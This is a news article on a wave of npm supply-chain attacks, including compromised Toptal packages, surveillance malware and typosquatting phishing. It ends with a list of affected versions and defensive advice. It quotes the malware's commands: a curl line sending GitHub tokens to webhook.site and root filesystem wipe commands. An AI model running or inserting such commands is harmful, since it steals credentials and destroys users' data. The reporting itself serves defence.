Open Source in Crisis: A Wave of Supply-Chain Attacks Is Spreading Fast
In a troubling escalation for the open source ecosystem, supply-chain attacks targeting public code repositories are rising at an alarming pace. The latest wave—detected by security firm Socket—has affected thousands of users by injecting malware into popular npm packages, including those published by global talent marketplace Toptal. One of the affected packages, “is,” has nearly 2.8 million weekly downloads, underscoring the massive potential reach of the attack.
How the Attack Happened: From GitHub to npm
The attackers compromised Toptal’s GitHub organization, leveraging that access to push ten malicious npm packages. These packages were downloaded around 5,000 times before removal. Socket’s analysis suggests that GitHub Actions or stored npm tokens might have enabled publishing directly from the compromised GitHub account.
Although the exact mechanism remains unclear, the tight integration between GitHub and npm workflows makes this a prime attack vector. Without sufficient forensic data, researchers still cannot confirm whether the attack stemmed from GitHub first or occurred simultaneously on both platforms.
Malware Mechanics: Token Theft and System Wipeouts
Once installed, the infected packages executed a two-stage payload. First, they exfiltrated GitHub authentication tokens by invoking the following command:
curl -d "$(gh auth token)" https://webhook.site/...
With these tokens, attackers could silently infiltrate other repositories. The second stage was even more destructive. It issued commands to wipe the victim’s filesystem, using:
- For Unix systems:
sudo rm -rf --no-preserve-root / - For Windows systems:
rm /s /q
These commands bypass typical safety mechanisms and, if executed with elevated privileges, could cause total data loss.
Surveillance Malware: More Than Just Token Theft
In a related incident, Socket reported additional packages on npm and PyPI that included advanced surveillance functionality. Once installed, the malware silently enabled:
- Keylogging
- Webcam and screen capture
- Fingerprinting
- Credential theft
Researchers described the tactic as “surveillance malware” designed to covertly monitor developer environments and siphon data to attacker-controlled infrastructure.
Phishing and Typosquatting: The Human Factor in the Breach
The attackers also used targeted phishing campaigns to steal developer credentials. One such phishing site—npnjs.com—was a typosquatting spoof of the legitimate npmjs.com. The site even mimicked npm’s authentication token format to fool users into logging in and exposing sensitive information.
A compromised developer account was then used to inject malicious code into three widely used npm packages.
Impacted Packages and Versions: A Call for Immediate Audit
Developers should urgently audit their environments for the following packages and versions:
@toptal/picasso-tailwind@toptal/picasso-charts@toptal/picasso-shared@toptal/picasso-provider@toptal/picasso-select@toptal/picasso-quote@toptal/picasso-forms@xene/core@toptal/picasso-utils@toptal/picasso-typographyis(versions 3.3.1, 5.0.0)got-fetch(versions 5.1.11, 5.1.12)eslint-config-prettier(8.10.1, 9.1.1, 10.1.6, 10.1.7)eslint-plugin-prettier(4.2.2, 4.2.3)synckit(0.11.9)@pkgr/core(0.2.8)napi-postinstall(0.3.1)
Recommended Actions for Developers
To defend against future supply-chain threats, developers should implement the following precautions immediately:
- Review all
package.jsonlifecycle scripts before installing new packages - Monitor for suspicious publishing or changes in visibility of dependencies
- Integrate automated scanning tools in CI/CD pipelines
- Rotate authentication tokens regularly
- Enforce multi-factor authentication (MFA) wherever possible
Additionally, platform maintainers should mandate MFA to reduce the likelihood of account takeovers.
Conclusion: Open Source Needs Better Armor
This latest string of attacks proves that no open source repository is safe by default. The ease with which attackers infiltrated developer accounts and published widely used malicious packages shows just how fragile the current system is. Developers and platform maintainers must urgently adopt stricter security practices and push for greater transparency and accountability in the supply chain. Otherwise, we risk poisoning the very foundation upon which modern software is built.
